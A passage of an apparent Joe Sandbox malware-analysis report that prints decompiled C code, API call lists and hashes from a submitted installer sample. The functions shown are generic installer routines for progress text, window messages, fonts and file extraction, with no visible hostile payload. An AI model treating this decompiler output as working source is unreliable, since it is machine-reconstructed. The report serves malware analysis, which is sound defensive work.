                                                                                                                                                                              • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1202605160.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1202572962.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202644162.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202672082.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1780285237-0
                                                                                                                                                                            • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                            • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                            • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00404F12(CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				CHAR* _v32;
                                                                                                                                                                            				long _v44;
                                                                                                                                                                            				int _v48;
                                                                                                                                                                            				void* _v52;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                            				CHAR* _t28;
                                                                                                                                                                            				long _t29;
                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                            
                                                                                                                                                                            				_t26 =  *0x422ee4; // 0x0
                                                                                                                                                                            				_v8 = _t26;
                                                                                                                                                                            				if(_t26 != 0) {
                                                                                                                                                                            					_t27 =  *0x4237b4;
                                                                                                                                                                            					_v12 = _t27;
                                                                                                                                                                            					_t39 = _t27 & 0x00000001;
                                                                                                                                                                            					if(_t39 == 0) {
                                                                                                                                                                            						E00405D1B(0, _t39, 0x41f4e8, 0x41f4e8, _a4);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t26 = lstrlenA(0x41f4e8);
                                                                                                                                                                            					_a4 = _t26;
                                                                                                                                                                            					if(_a8 == 0) {
                                                                                                                                                                            						L6:
                                                                                                                                                                            						if((_v12 & 0x00000004) == 0) {
                                                                                                                                                                            							_t26 = SetWindowTextA( *0x422ec8, 0x41f4e8);
                                                                                                                                                                            						}
                                                                                                                                                                            						if((_v12 & 0x00000002) == 0) {
                                                                                                                                                                            							_v32 = 0x41f4e8;
                                                                                                                                                                            							_v52 = 1;
                                                                                                                                                                            							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                                                                                                            							_v44 = 0;
                                                                                                                                                                            							_v48 = _t29 - _t39;
                                                                                                                                                                            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                                                                                                            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                            							_t28 = _a4;
                                                                                                                                                                            							 *((char*)(_t28 + 0x41f4e8)) = 0;
                                                                                                                                                                            							return _t28;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                                                                                            						if(_t26 < 0x800) {
                                                                                                                                                                            							_t26 = lstrcatA(0x41f4e8, _a8);
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t26;
                                                                                                                                                                            			}

















                                                                                                                                                                            0x00404f18
                                                                                                                                                                            0x00404f24
                                                                                                                                                                            0x00404f27
                                                                                                                                                                            0x00404f2d
                                                                                                                                                                            0x00404f39
                                                                                                                                                                            0x00404f3c
                                                                                                                                                                            0x00404f3f
                                                                                                                                                                            0x00404f45
                                                                                                                                                                            0x00404f45
                                                                                                                                                                            0x00404f4b
                                                                                                                                                                            0x00404f53
                                                                                                                                                                            0x00404f56
                                                                                                                                                                            0x00404f73
                                                                                                                                                                            0x00404f77
                                                                                                                                                                            0x00404f80
                                                                                                                                                                            0x00404f80
                                                                                                                                                                            0x00404f8a
                                                                                                                                                                            0x00404f93
                                                                                                                                                                            0x00404f9f
                                                                                                                                                                            0x00404fa6
                                                                                                                                                                            0x00404faa
                                                                                                                                                                            0x00404fad
                                                                                                                                                                            0x00404fc0
                                                                                                                                                                            0x00404fce
                                                                                                                                                                            0x00404fce
                                                                                                                                                                            0x00404fd2
                                                                                                                                                                            0x00404fd4
                                                                                                                                                                            0x00404fd7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404fd7
                                                                                                                                                                            0x00404f58
                                                                                                                                                                            0x00404f60
                                                                                                                                                                            0x00404f68
                                                                                                                                                                            0x00404f6e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404f6e
                                                                                                                                                                            0x00404f68
                                                                                                                                                                            0x00404f56
                                                                                                                                                                            0x00404fe1

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                                                                                                                                                            • lstrlenA.KERNEL32(00402FCF,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                                                                                                                                                            • lstrcatA.KERNEL32(0041F4E8,00402FCF,00402FCF,0041F4E8,00000000,0040E8C0,00000000), ref: 00404F6E
                                                                                                                                                                            • SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 00404F80
                                                                                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                                                                                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                                                                                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2531174081-0
                                                                                                                                                                            • Opcode ID: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
                                                                                                                                                                            • Instruction ID: 5a9a404093729f8c7a4ed64dcb73daf90ff889549f225b9df3951733f5861a8d
                                                                                                                                                                            • Opcode Fuzzy Hash: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
                                                                                                                                                                            • Instruction Fuzzy Hash: EB219DB1A00119BADF119FA5DD84ADEBFB9EF44354F14807AF904B6290C7788E41DBA8
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E004047DD(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                            				long _v8;
                                                                                                                                                                            				signed char _v12;
                                                                                                                                                                            				unsigned int _v16;
                                                                                                                                                                            				void* _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				long _v56;
                                                                                                                                                                            				void* _v60;
                                                                                                                                                                            				long _t15;
                                                                                                                                                                            				unsigned int _t19;
                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                            				struct HWND__* _t28;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = _a4;
                                                                                                                                                                            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                                                                            				if(_a8 == 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_v56 = _t15;
                                                                                                                                                                            					_v60 = 4;
                                                                                                                                                                            					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                                                                            					return _v24;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t19 = GetMessagePos();
                                                                                                                                                                            				_v16 = _t19 >> 0x10;
                                                                                                                                                                            				_v20 = _t19;
                                                                                                                                                                            				ScreenToClient(_t28,  &_v20);
                                                                                                                                                                            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                                                                                                                            					_t15 = _v8;
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t25 | 0xffffffff;
                                                                                                                                                                            			}














                                                                                                                                                                            0x004047eb
                                                                                                                                                                            0x004047f8
                                                                                                                                                                            0x004047fe
                                                                                                                                                                            0x0040483c
                                                                                                                                                                            0x0040483c
                                                                                                                                                                            0x0040484b
                                                                                                                                                                            0x00404852
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404854
                                                                                                                                                                            0x00404800
                                                                                                                                                                            0x0040480f
                                                                                                                                                                            0x00404817
                                                                                                                                                                            0x0040481a
                                                                                                                                                                            0x0040482c
                                                                                                                                                                            0x00404832
                                                                                                                                                                            0x00404839
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404839
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047F8
                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404800
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0040481A
                                                                                                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040482C
                                                                                                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404852
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                            • String ID: f
                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                                                                            • Instruction ID: 206dc1e0429e6aa6b627cd25208fa2295557d59b2a7717453fa0c9894da25502
                                                                                                                                                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                                                                            • Instruction Fuzzy Hash: E6015276D00259BADB01DB94DC45FFEBBBCAF55711F10412BBA10B61C0C7B4A501CBA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00402B7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                            				char _v68;
                                                                                                                                                                            				int _t11;
                                                                                                                                                                            				int _t20;
                                                                                                                                                                            
                                                                                                                                                                            				if(_a8 == 0x110) {
                                                                                                                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                                                                            					_a8 = 0x113;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_a8 == 0x113) {
                                                                                                                                                                            					_t20 =  *0x40a8b8; // 0x46d8a
                                                                                                                                                                            					_t11 =  *0x4168c4; // 0x48ca0
                                                                                                                                                                            					if(_t20 >= _t11) {
                                                                                                                                                                            						_t20 = _t11;
                                                                                                                                                                            					}
                                                                                                                                                                            					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                                                                                            					SetWindowTextA(_a4,  &_v68);
                                                                                                                                                                            					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                                                                            				}
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}






                                                                                                                                                                            0x00402b8c
                                                                                                                                                                            0x00402b9a
                                                                                                                                                                            0x00402ba0
                                                                                                                                                                            0x00402ba0
                                                                                                                                                                            0x00402bae
                                                                                                                                                                            0x00402bb0
                                                                                                                                                                            0x00402bb6
                                                                                                                                                                            0x00402bbd
                                                                                                                                                                            0x00402bbf
                                                                                                                                                                            0x00402bbf
                                                                                                                                                                            0x00402bd5
                                                                                                                                                                            0x00402be5
                                                                                                                                                                            0x00402bf7
                                                                                                                                                                            0x00402bf7
                                                                                                                                                                            0x00402bff

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                                                                                                            • MulDiv.KERNEL32(00046D8A,00000064,00048CA0), ref: 00402BC5
                                                                                                                                                                            • wsprintfA.USER32 ref: 00402BD5
                                                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                                                                                            Strings
                                                                                                                                                                            • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                            • Opcode ID: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
                                                                                                                                                                            • Instruction ID: bd73235a5a2a729140de961e31d76a0e47d27260d0eaef7d75f80e35c4c54abd
                                                                                                                                                                            • Opcode Fuzzy Hash: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
                                                                                                                                                                            • Instruction Fuzzy Hash: EF01F471540208BBEF109F60DD49EEE3B79EB04305F008039FA16B51D1D7B59955DF59
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                            			E00401D38() {
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				int _t7;
                                                                                                                                                                            				signed char _t13;
                                                                                                                                                                            				struct HFONT__* _t16;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				struct HDC__* _t26;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            				void* _t30;
                                                                                                                                                                            
                                                                                                                                                                            				_t26 = GetDC( *(_t30 - 8));
                                                                                                                                                                            				_t7 = GetDeviceCaps(_t26, 0x5a);
                                                                                                                                                                            				0x40a7f0->lfHeight =  ~(MulDiv(E00402A1D(2), _t7, 0x48));
                                                                                                                                                                            				ReleaseDC( *(_t30 - 8), _t26);
                                                                                                                                                                            				 *0x40a800 = E00402A1D(3);
                                                                                                                                                                            				_t13 =  *((intOrPtr*)(_t30 - 0x18));
                                                                                                                                                                            				 *0x40a807 = 1;
                                                                                                                                                                            				 *0x40a804 = _t13 & 0x00000001;
                                                                                                                                                                            				 *0x40a805 = _t13 & 0x00000002;
                                                                                                                                                                            				 *0x40a806 = _t13 & 0x00000004;
                                                                                                                                                                            				E00405D1B(_t20, _t26, _t28, "Tahoma",  *((intOrPtr*)(_t30 - 0x24)));
                                                                                                                                                                            				_t16 = CreateFontIndirectA(0x40a7f0);
                                                                                                                                                                            				_push(_t16);
                                                                                                                                                                            				_push(_t28);
                                                                                                                                                                            				E00405C57();
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t30 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}











                                                                                                                                                                            0x00401d41
                                                                                                                                                                            0x00401d48
                                                                                                                                                                            0x00401d63
                                                                                                                                                                            0x00401d68
                                                                                                                                                                            0x00401d75
                                                                                                                                                                            0x00401d7a
                                                                                                                                                                            0x00401d85
                                                                                                                                                                            0x00401d8c
                                                                                                                                                                            0x00401d9e
                                                                                                                                                                            0x00401da4
                                                                                                                                                                            0x00401da9
                                                                                                                                                                            0x00401db3
                                                                                                                                                                            0x00402513
                                                                                                                                                                            0x00401561
                                                                                                                                                                            0x00402877
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(?), ref: 00401D3B
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                                                                                            • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                            • String ID: Tahoma
                                                                                                                                                                            • API String ID: 3808545654-3580928618
                                                                                                                                                                            • Opcode ID: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
                                                                                                                                                                            • Instruction ID: 818c9bdddfe1b1fffd76dbb1b88acba4993fd419864b94457e62d7fc32e1ff32
                                                                                                                                                                            • Opcode Fuzzy Hash: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
                                                                                                                                                                            • Instruction Fuzzy Hash: FE016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E3C67811569B3F
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                            			E004026C6(void* __ebx) {
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				long _t31;
                                                                                                                                                                            				void* _t45;
                                                                                                                                                                            				void* _t49;
                                                                                                                                                                            				void* _t51;
                                                                                                                                                                            				void* _t54;
                                                                                                                                                                            				void* _t55;
                                                                                                                                                                            				void* _t56;
                                                                                                                                                                            
                                                                                                                                                                            				_t45 = __ebx;
                                                                                                                                                                            				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                                                                                                                            				_t50 = E00402A3A(0xfffffff0);
                                                                                                                                                                            				 *(_t56 - 0x38) = _t23;
                                                                                                                                                                            				if(E004057D8(_t50) == 0) {
                                                                                                                                                                            					E00402A3A(0xffffffed);
                                                                                                                                                                            				}
                                                                                                                                                                            				E00405947(_t50);
                                                                                                                                                                            				_t26 = E0040596C(_t50, 0x40000000, 2);
                                                                                                                                                                            				 *(_t56 + 8) = _t26;
                                                                                                                                                                            				if(_t26 != 0xffffffff) {
                                                                                                                                                                            					_t31 =  *0x423714;
                                                                                                                                                                            					 *(_t56 - 0x30) = _t31;
                                                                                                                                                                            					_t49 = GlobalAlloc(0x40, _t31);
                                                                                                                                                                            					if(_t49 != _t45) {
                                                                                                                                                                            						E00403091(_t45);
                                                                                                                                                                            						E0040307B(_t49,  *(_t56 - 0x30));
                                                                                                                                                                            						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                                                                                                            						 *(_t56 - 0x34) = _t54;
                                                                                                                                                                            						if(_t54 != _t45) {
                                                                                                                                                                            							_push( *(_t56 - 0x20));
                                                                                                                                                                            							_push(_t54);
                                                                                                                                                                            							_push(_t45);
                                                                                                                                                                            							_push( *((intOrPtr*)(_t56 - 0x24)));
                                                                                                                                                                            							E00402E9F();
                                                                                                                                                                            							while( *_t54 != _t45) {
                                                                                                                                                                            								_t47 =  *_t54;
                                                                                                                                                                            								_t55 = _t54 + 8;
                                                                                                                                                                            								 *(_t56 - 0x50) =  *_t54;
                                                                                                                                                                            								E00405927( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                                                                                                            								_t54 = _t55 +  *(_t56 - 0x50);
                                                                                                                                                                            							}
                                                                                                                                                                            							GlobalFree( *(_t56 - 0x34));
                                                                                                                                                                            						}
                                                                                                                                                                            						E00405A13( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                                                                                                                                            						GlobalFree(_t49);
                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                            						_push( *(_t56 + 8));
                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                            						 *((intOrPtr*)(_t56 - 0xc)) = E00402E9F();
                                                                                                                                                                            					}
                                                                                                                                                                            					CloseHandle( *(_t56 + 8));
                                                                                                                                                                            				}
                                                                                                                                                                            				_t51 = 0xfffffff3;
                                                                                                                                                                            				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                                                                                                                            					_t51 = 0xffffffef;
                                                                                                                                                                            					DeleteFileA( *(_t56 - 0x38));
                                                                                                                                                                            					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_t51);
                                                                                                                                                                            				E00401423();
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t56 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}











                                                                                                                                                                            0x004026c6
                                                                                                                                                                            0x004026c8
                                                                                                                                                                            0x004026d4
                                                                                                                                                                            0x004026d7
                                                                                                                                                                            0x004026e1
                                                                                                                                                                            0x004026e5
                                                                                                                                                                            0x004026e5
                                                                                                                                                                            0x004026eb
                                                                                                                                                                            0x004026f8
                                                                                                                                                                            0x00402700
                                                                                                                                                                            0x00402703
                                                                                                                                                                            0x00402709
                                                                                                                                                                            0x00402717
                                                                                                                                                                            0x0040271c
                                                                                                                                                                            0x00402720
                                                                                                                                                                            0x00402723
                                                                                                                                                                            0x0040272c
                                                                                                                                                                            0x00402738
                                                                                                                                                                            0x0040273c
                                                                                                                                                                            0x0040273f
                                                                                                                                                                            0x00402741
                                                                                                                                                                            0x00402744
                                                                                                                                                                            0x00402745
                                                                                                                                                                            0x00402746
                                                                                                                                                                            0x00402749
                                                                                                                                                                            0x00402768
                                                                                                                                                                            0x00402750
                                                                                                                                                                            0x00402755
                                                                                                                                                                            0x0040275d
                                                                                                                                                                            0x00402760
                                                                                                                                                                            0x00402765
                                                                                                                                                                            0x00402765
                                                                                                                                                                            0x0040276f
                                                                                                                                                                            0x0040276f
                                                                                                                                                                            0x0040277c
                                                                                                                                                                            0x00402782
                                                                                                                                                                            0x00402788
                                                                                                                                                                            0x00402789
                                                                                                                                                                            0x0040278a
                                                                                                                                                                            0x0040278d
                                                                                                                                                                            0x00402794
                                                                                                                                                                            0x00402794
                                                                                                                                                                            0x0040279a
                                                                                                                                                                            0x0040279a
                                                                                                                                                                            0x004027a5
                                                                                                                                                                            0x004027a6
                                                                                                                                                                            0x004027aa
                                                                                                                                                                            0x004027ae
                                                                                                                                                                            0x004027b4
                                                                                                                                                                            0x004027b4
                                                                                                                                                                            0x004027bb
                                                                                                                                                                            0x004021c4
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0040276F
